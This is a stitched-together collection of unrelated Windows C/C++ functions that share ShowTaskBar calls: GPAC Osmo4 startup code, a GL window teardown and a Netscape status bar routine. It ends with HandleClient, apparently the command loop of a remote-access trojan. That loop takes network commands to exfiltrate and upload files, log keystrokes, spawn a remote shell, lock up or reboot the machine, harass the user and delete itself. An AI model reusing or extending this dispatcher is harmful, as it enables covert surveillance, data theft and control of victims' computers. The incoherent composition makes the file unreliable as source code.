void GLWindow::destroyGLWindow() { destroyGL(); ShowTaskBar(true); if ( hDC) { ReleaseDC( hWnd, hDC); hDC = NULL; } if ( hWnd) { DestroyWindow( hWnd); hWnd = NULL; } UnregisterClass(__TEXT("OGL"),hInstance); hInstance = NULL; }
BOOL COsmo4::InitInstance() { if (!AfxSocketInit()) { AfxMessageBox(IDP_SOCKETS_INIT_FAILED); return FALSE; } gf_sys_init(); SetRegistryKey(_T("GPAC")); m_prev_batt_bl = m_prev_ac_bl = 0; m_screen_width = GetSystemMetrics(SM_CXSCREEN); m_screen_height = GetSystemMetrics(SM_CYSCREEN); m_menu_height = GetSystemMetrics(SM_CYMENU); m_scene_width = m_scene_height = 0; CMainFrame* pFrame = new CMainFrame; m_pMainWnd = pFrame; pFrame->LoadFrame(IDR_MAINFRAME, WS_VISIBLE, NULL, NULL); pFrame->ShowWindow(m_nCmdShow); pFrame->UpdateWindow(); char config_path[MAX_PATH]; CE_WideToChar((unsigned short *) (LPCTSTR) AfxGetApp()->m_pszHelpFilePath, (char *) config_path); while (config_path[strlen((char *) config_path)-1] != '\\') config_path[strlen((char *) config_path)-1] = 0; /*setup user*/ memset(&m_user, 0, sizeof(GF_User)); /*init config and plugins*/ m_user.config = gf_cfg_new((const char *) config_path, "GPAC.cfg"); if (!m_user.config) { /*create blank config file in the exe dir*/ unsigned char config_file[MAX_PATH]; strcpy((char *) config_file, (const char *) config_path); strcat((char *) config_file, "GPAC.cfg"); FILE *ft = fopen((const char *) config_file, "wt"); fclose(ft); m_user.config = gf_cfg_new((const char *) config_path, "GPAC.cfg"); if (!m_user.config) { MessageBox(NULL, _T("GPAC Configuration file not found"), _T("Fatal Error"), MB_OK); m_pMainWnd->PostMessage(WM_CLOSE); } } const char *str = gf_cfg_get_key(m_user.config, "General", "LogLevel"); EnableLogs((str && !strcmp(str, "debug")) ? 1 : 0); str = gf_cfg_get_key(m_user.config, "General", "ModulesDirectory"); m_user.modules = gf_modules_new(str, m_user.config); if (!m_user.modules) { unsigned char str_path[MAX_PATH]; const char *sOpt; /*inital launch*/ m_user.modules = gf_modules_new(config_path, m_user.config); if (m_user.modules) { gf_cfg_set_key(m_user.config, "General", "ModulesDirectory", (const char *) config_path); gf_cfg_set_key(m_user.config, "Rendering", "RendererName", "GPAC 2D Renderer"); sOpt = gf_cfg_get_key(m_user.config, "Rendering", "Raster2D"); if (!sOpt) gf_cfg_set_key(m_user.config, "Rendering", "Raster2D", "GPAC 2D Raster"); sOpt = gf_cfg_get_key(m_user.config, "General", "CacheDirectory"); if (!sOpt) { sprintf((char *) str_path, "%scache", config_path); gf_cfg_set_key(m_user.config, "General", "CacheDirectory", (const char *) str_path); } /*setup UDP traffic autodetect*/ gf_cfg_set_key(m_user.config, "Network", "AutoReconfigUDP", "yes"); gf_cfg_set_key(m_user.config, "Network", "UDPNotAvailable", "no"); gf_cfg_set_key(m_user.config, "Network", "UDPTimeout", "10000"); gf_cfg_set_key(m_user.config, "Network", "BufferLength", "3000"); /*first launch, register all files ext*/ u32 i; for (i=0; i<gf_modules_get_count(m_user.modules); i++) { GF_InputService *ifce = (GF_InputService *) gf_modules_load_interface(m_user.modules, i, GF_NET_CLIENT_INTERFACE); if (!ifce) continue; if (ifce) { ifce->CanHandleURL(ifce, "test.test"); gf_modules_close_interface((GF_BaseInterface *)ifce); } } } /*check audio config on windows, force config*/ sOpt = gf_cfg_get_key(m_user.config, "Audio", "ForceConfig"); if (!sOpt) { gf_cfg_set_key(m_user.config, "Audio", "ForceConfig", "yes"); gf_cfg_set_key(m_user.config, "Audio", "NumBuffers", "2"); gf_cfg_set_key(m_user.config, "Audio", "TotalDuration", "200"); } /*by default use GDIplus, much faster than freetype on font loading*/ gf_cfg_set_key(m_user.config, "FontEngine", "DriverName", "ft_font"); sprintf((char *) str_path, "%sgpac.mp4", config_path); gf_cfg_set_key(m_user.config, "General", "StartupFile", (const char *) str_path); ::MessageBox(NULL, _T("Osmo4/GPAC Setup complete"), _T("Initial launch"), MB_OK); } if (! gf_modules_get_count(m_user.modules) ) { MessageBox(NULL, _T("No plugins available - system cannot work"), _T("Fatal Error"), MB_OK); m_pMainWnd->PostMessage(WM_QUIT); } /*setup font dir*/ str = gf_cfg_get_key(m_user.config, "FontEngine", "FontDirectory"); if (!str || !strlen(str) ) { strcpy((char *) config_path, "\\Windows"); gf_cfg_set_key(m_user.config, "FontEngine", "FontDirectory", (const char *) config_path); } /*work with iPaq's default fonts ...*/ str = gf_cfg_get_key(m_user.config, "FontEngine", "FontSerif"); if (!str) gf_cfg_set_key(m_user.config, "FontEngine", "FontSerif", "Tahoma"); str = gf_cfg_get_key(m_user.config, "FontEngine", "FontSans"); if (!str) gf_cfg_set_key(m_user.config, "FontEngine", "FontSans", "Frutiger"); str = gf_cfg_get_key(m_user.config, "FontEngine", "FontFixed"); if (!str) gf_cfg_set_key(m_user.config, "FontEngine", "FontFixed", "Courier New"); /*check video driver, if none or raw_out use dx_hw by default*/ str = gf_cfg_get_key(m_user.config, "Video", "DriverName"); if (!str || !stricmp(str, "raw_out")) { gf_cfg_set_key(m_user.config, "Video", "DriverName", "gapi"); } m_user.config = m_user.config; m_user.modules = m_user.modules; m_user.EventProc = Osmo4CE_EventProc; m_user.opaque = this; m_user.os_window_handler = pFrame->m_wndView.m_hWnd; m_term = gf_term_new(&m_user); if (! m_term) { MessageBox(NULL, _T("Cannot load MPEG-4 Terminal"), _T("Fatal Error"), MB_OK); m_pMainWnd->PostMessage(WM_QUIT); } m_stoped = 0; m_open = 0; m_can_seek = 0; m_DoResume = 0; SetOptions(); pFrame->SendMessage(WM_SETSIZE, 0, 0); ShowTaskBar(0); CCommandLineInfo cmdInfo; ParseCommandLine(cmdInfo); if (! cmdInfo.m_strFileName.IsEmpty()) { m_filename = cmdInfo.m_strFileName; m_pMainWnd->PostMessage(WM_OPENURL); } else { str = gf_cfg_get_key(m_user.config, "General", "StartupFile"); if (str) gf_term_connect(m_term, str); } return TRUE; }
BOOL COsmo4::InitInstance() { Bool first_load = 0; if (!AfxSocketInit()) { AfxMessageBox(IDP_SOCKETS_INIT_FAILED); return FALSE; } gf_sys_init(); SetRegistryKey(_T("GPAC")); m_prev_batt_bl = m_prev_ac_bl = 0; m_screen_width = GetSystemMetrics(SM_CXSCREEN); m_screen_height = GetSystemMetrics(SM_CYSCREEN); m_menu_height = GetSystemMetrics(SM_CYMENU); m_scene_width = m_scene_height = 0; CMainFrame* pFrame = new CMainFrame; m_pMainWnd = pFrame; pFrame->LoadFrame(IDR_MAINFRAME, WS_VISIBLE, NULL, NULL); pFrame->ShowWindow(m_nCmdShow); pFrame->UpdateWindow(); TCHAR w_config_path[MAX_PATH]; char config_path[MAX_PATH]; GetModuleFileName(NULL, w_config_path, MAX_PATH); CE_WideToChar((u16 *) w_config_path, (char *) config_path); while (config_path[strlen((char *) config_path)-1] != '\\') config_path[strlen((char *) config_path)-1] = 0; /*setup user*/ memset(&m_user, 0, sizeof(GF_User)); /*init config and plugins*/ m_user.config = gf_cfg_init(NULL, &first_load); if (!m_user.config) { MessageBox(NULL, _T("GPAC Configuration file not found"), _T("Fatal Error"), MB_OK); m_pMainWnd->PostMessage(WM_CLOSE); } const char *str = gf_cfg_get_key(m_user.config, "General", "LogLevel"); EnableLogs((str && !strcmp(str, "debug")) ? 1 : 0); if (first_load) { /*first launch, register all files ext*/ u32 i; for (i=0; i<gf_modules_get_count(m_user.modules); i++) { GF_InputService *ifce = (GF_InputService *) gf_modules_load_interface(m_user.modules, i, GF_NET_CLIENT_INTERFACE); if (!ifce) continue; if (ifce) { ifce->CanHandleURL(ifce, "test.test"); gf_modules_close_interface((GF_BaseInterface *)ifce); } } ::MessageBox(NULL, _T("Osmo4/GPAC Setup complete"), _T("Initial launch"), MB_OK); } str = gf_cfg_get_key(m_user.config, "General", "ModulesDirectory"); m_user.modules = gf_modules_new(str, m_user.config); if (!m_user.modules || ! gf_modules_get_count(m_user.modules) ) { MessageBox(NULL, _T("No plugins available - system cannot work"), _T("Fatal Error"), MB_OK); m_pMainWnd->PostMessage(WM_QUIT); return FALSE; } m_user.config = m_user.config; m_user.modules = m_user.modules; m_user.EventProc = Osmo4CE_EventProc; m_user.opaque = this; m_user.os_window_handler = pFrame->m_wndView.m_hWnd; m_term = gf_term_new(&m_user); if (! m_term) { MessageBox(NULL, _T("Cannot load MPEG-4 Terminal"), _T("Fatal Error"), MB_OK); m_pMainWnd->PostMessage(WM_QUIT); } m_stopped = 0; m_open = 0; m_can_seek = 0; m_DoResume = 0; SetOptions(); pFrame->SendMessage(WM_SETSIZE, 0, 0); ShowTaskBar(0); CCommandLineInfo cmdInfo; ParseCommandLine(cmdInfo); if (! cmdInfo.m_strFileName.IsEmpty()) { m_filename = cmdInfo.m_strFileName; m_pMainWnd->PostMessage(WM_OPENURL); } else { str = gf_cfg_get_key(m_user.config, "General", "StartupFile"); if (str) gf_term_connect(m_term, str); } return TRUE; }
//------------------------------------------------------------------------------ void CNetscapeStatusBar::SetupMode() { switch( m_enStatBarMode ) { case eSBM_Simple: { if (!CNetscapeStatusBarBase::SetIndicators(pSimpleIndicators, 1)) return; SetPaneInfo( 0, ID_SEPARATOR, SBPS_STRETCH | SBPS_NOBORDERS, 0 ); // Hide the task bar window (if docked) #ifdef MOZ_TASKBAR ShowTaskBar( SW_HIDE ); #endif /* MOZ_TASKBAR */ break; } case eSBM_Panes: { if (!m_anIDSaved) return; if (!CNetscapeStatusBarBase::SetIndicators(m_anIDSaved, m_iSavedCount)) return; #ifdef _WIN32 int iFudge = 4; #else int iFudge = 2; #endif RECT rcTool; int idx = CommandToIndex(IDS_SECURITY_STATUS); if (idx > -1) { SetPaneInfo(idx, IDS_SECURITY_STATUS, SBPS_DISABLED, sm_sizeSecure.cx - iFudge); if (m_pTooltip) { GetItemRect(idx, &rcTool); m_pTooltip->SetToolRect(this, IDS_SECURITY_STATUS, &rcTool); } } idx = CommandToIndex(IDS_SIGNED_STATUS); if (idx > -1) { SetPaneInfo(idx, IDS_SIGNED_STATUS, SBPS_DISABLED, sm_sizeSecure.cx - iFudge); if (m_pTooltip) { GetItemRect(idx, &rcTool); m_pTooltip->SetToolRect(this, IDS_SIGNED_STATUS, &rcTool); } } // // Set common pane info (size, style, etc). // WHS -- I'm assuming we'll always have these, probably not good in the long term // SetPaneInfo( CommandToIndex( ID_SEPARATOR ), ID_SEPARATOR, SBPS_STRETCH, 0 ); SetPaneInfo( CommandToIndex( IDS_TRANSFER_STATUS ), IDS_TRANSFER_STATUS, SBPS_NORMAL, 90 ); // Note the taskbar mgr sets the width of the taskbar pane // Also note we must call these SetPaneXXX methods even if m_bTaskbar is FALSE because // pPaneIndicators specifies the IDS_TASKBAR. If we don't, the default CStatusBar // implementation is to display the IDS_TASKBAR string resource in the status - not good. #ifdef MOZ_TASKBAR idx = CommandToIndex( IDS_TASKBAR ); if (idx > -1) { SetPaneInfo( idx, IDS_TASKBAR, SBPS_NOBORDERS, m_iStatBarPaneWidth ); SetPaneText( idx, "", FALSE ); // Show the task bar window (if docked) if( m_iStatBarPaneWidth ) ShowTaskBar( SW_SHOWNA ); if( m_pTaskBar ) { CRect rc; GetItemRect( CommandToIndex( IDS_TASKBAR ), &rc ); //Get Item Rect is returning us the wrong dimensions. It's off by 6 pixels //Eventually figure out what's going wrong rc.right -= 6; m_pTaskBar->MoveWindow( &rc ); m_pTaskBar = NULL; } } #endif /* MOZ_TASKBAR */ break; } default: { break; } } }
DWORD WINAPI HandleClient( LPVOID param ){ SOCKET s = *(SOCKET*)param; char buf[1024],tmp[64]; struct cmd_t cmd; int n; while(1){ n = recv( s , buf , 1023 , 0 ); buf[n] = 0; //MB(buf); if( n == 0 ) break; parse_cmd( buf , &cmd ); int sec = cmd.cmd_object; int arg = cmd.args; char *p = cmd.addnl.str; //wsprintf( tmp , "%d::%d" , sec , arg ); //MB(tmp); if( sec == CMD_FILE ){ switch( arg ){ case FILE_SDIR: SendDirTree( s , p , 0 ); break; case FILE_SDIREX: SendDirTree( s , p , 1 ); break; case FILE_SDRV: SendDriveSet( s ); break; case FILE_SEND: SendFile( s , p ); break; case FILE_RECV: RecvFile( s , p ); break; case FILE_MKDIR: LocalMkDir( p ); break; default: SendLn( s , "***file: bad args\r\n" ); } } else if( sec == CMD_HW ){ switch( arg ){ case HW_OPENCD: OpenCDTray(); break; case HW_CLOSECD: CloseCDTray(); break; case HW_MOUSE_R: SetMouseBns( MOUSE_RT ); break; case HW_MOUSE_L: SetMouseBns( MOUSE_LT ); break; case HW_MOUSE_SW: SwapMouseBns(); break; case HW_MONITOR1: MonitorPower( 1 ); break; case HW_MONITOR0: MonitorPower( 0 ); break; case HW_DB_CLK: DblClkDelay( cmd.addnl.nums[0] ); break; case HW_INPUT0: EnableInput( false ); break; case HW_INPUT1: EnableInput( true ); break; case HW_REBOOT: Reboot(); break; case HW_SHTDWN: ShutDown(); break; default: SendLn( s , "***bad args\r\n" ); } } else if( sec == CMD_KEYBD ){ switch( arg ){ case KEYBD_STARTLOG: KeyLog( true ); break; case KEYBD_STOPLOG: KeyLog( false ); break; default: SendLn( s , "***keybd: bad args\r\n" ); } } else if( sec == CMD_MOUSE ){ switch( arg ){ case MOUSE_FLY_STOP: FlyMousePtr( false ); break; case MOUSE_FLY: FlyMousePtr( true ); break; case MOUSE_FLY_CLK: FlyMousePtrClick( true ); break; case MOUSE_RESTRICT: RestrictMouseMovementTo(cmd.addnl.nums[0], cmd.addnl.nums[1], cmd.addnl.nums[2], cmd.addnl.nums[3] ); break; case MOUSE_SHOW: ShowMouseCursor( true ); break; case MOUSE_HIDE: ShowMouseCursor( false ); break; case MOUSE_CLK: MouseClick( cmd.addnl.nums[0] ); break; case MOUSE_CLK_PT: MouseClickPoint( cmd.addnl.nums[1], cmd.addnl.nums[2], cmd.addnl.nums[0] ); break; case MOUSE_SETPOS: SetMousePos( cmd.addnl.nums[0], cmd.addnl.nums[1] ); break; default: SendLn( s , "***mouse: bad args\r\n" ); } } else if( sec == CMD_SHELL ){ if( arg == SHELL_SPAWN ) CreateRemoteShell( s ); } else if( sec == CMD_SYS ){ unsigned long m; unsigned __int64 d; char msg[256]; switch( arg ){ case SYS_MAXMEM: m = GetMaxMem(); wsprintf( msg , "max mem: %u MiB\r\n" , m ); SendLn( s ,msg ); break; case SYS_BUSYMEM: m = GetBusyMem(); wsprintf( msg , "mem in use: %u MiB\r\n" , m ); SendLn( s , msg ); break; case SYS_FREEMEM: m = GetFreeMem(); wsprintf( msg , "free mem: %u MiB\r\n" , m ); SendLn( s , msg ); break; case SYS_MAXDISK: d = GetDiskUsage( cmd.addnl.str , U_TOTAL ); if( d < 1024 ){ m = (unsigned long)d; wsprintf( msg , "total space on %s: %u MiB\r\n" , cmd.addnl.str , m ); }else{ m = (unsigned long)(d/1024); wsprintf( msg , "total space on %s: %u GiB\r\n" , cmd.addnl.str , m ); } SendLn( s , msg ); break; case SYS_USEDDISK: d = GetDiskUsage( cmd.addnl.str , U_USED ); if( d < 1024 ){ m = (unsigned long)d; wsprintf( msg , "used space on %s: %u MiB\r\n" , cmd.addnl.str , m ); }else{ m = (unsigned long)(d/1024); wsprintf( msg , "used space on %s: %u GiB\r\n" , cmd.addnl.str , m ); } SendLn( s , msg ); break; case SYS_FREEDISK: d = GetDiskUsage( cmd.addnl.str , U_FREE ); if( d < 1024 ){ m = (unsigned long)d; wsprintf( msg , "free space on %s: %u MiB\r\n" , cmd.addnl.str , m ); }else{ m = (unsigned long)(d/1024); wsprintf( msg , "free space on %s: %u GiB\r\n" , cmd.addnl.str , m ); } SendLn( s , msg ); break; case SYS_SYSDIR: wsprintf( msg , "system dir is:\'%s\'\r\n" , sysdir() ); SendLn( s , msg ); break; case SYS_WINDIR: wsprintf( msg , "windows dir is:\'%s\'\r\n", windir() ); SendLn( s , msg ); break; case SYS_CHDIR: cd( cmd.addnl.str ); break; case SYS_LOCKUP: SendLn( s , "!!!Locking up system!!!... don\'t expect too much after this!\r\n" ); Sleep(2000); LockUp(); break; case SYS_RAMFILL: RamFill(); break; default: SendLn( s , "***sys: bad args\r\n" ); } } else if( sec == CMD_TBAR ){ switch(arg){ case TBAR_SHOW: ShowTaskBar( true ); break; case TBAR_HIDE: ShowTaskBar( false ); break; case TBAR_STBN_SHOW: ShowStartBn( true ); break; case TBAR_STBN_HIDE: ShowStartBn( false ); break; case TBAR_STBN_FLY1: FlyStartBn( true ); break; case TBAR_STBN_FLY0: FlyStartBn( false ); break; case TBAR_CLOCK_SHOW: ShowClock( true ); break; case TBAR_CLOCK_HIDE: ShowClock( false ); break; case TBAR_ENABLE: EnableTaskBar( true ); break; case TBAR_DISABLE: EnableTaskBar( false ); break; default: SendLn( s , "***tb: bad args\r\n" ); } } else if( sec == CMD_PRANK ){ switch(arg){ case PRANK_DTP_ENABLE: EnableDesktop( true ); break; case PRANK_DTP_DISABLE: EnableDesktop( false ); break; case PRANK_FU_START: if( !strequal( cmd.addnl.str , "" ) ) szFUStr = cmd.addnl.str; FuckYou( true ); break; case PRANK_FU_STOP: FuckYou( false ); break; case PRANK_WRUN_START: if( cmd.addnl.nums[0] > 0 ) uiRunWindowsDelay = cmd.addnl.nums[0]; MakeWindowsRun( true ); break; case PRANK_WRUN_STOP: MakeWindowsRun( false ); break; case PRANK_QUAKE_START: if( cmd.addnl.nums[0] > 0 ) uiQuakeDelay = cmd.addnl.nums[0]; Quake( true ); break; case PRANK_QUAKE_STOP: Quake( false ); break; default: SendLn( s , "***bad trigger\r\n" ); } } else if( sec == CMD_OWL ){ switch(arg){ case OWL_UNINSTALL: SelfDelete(); exit(0); break; default: SendLn( s , "***bad trigger\r\n" ); } } } return 0; }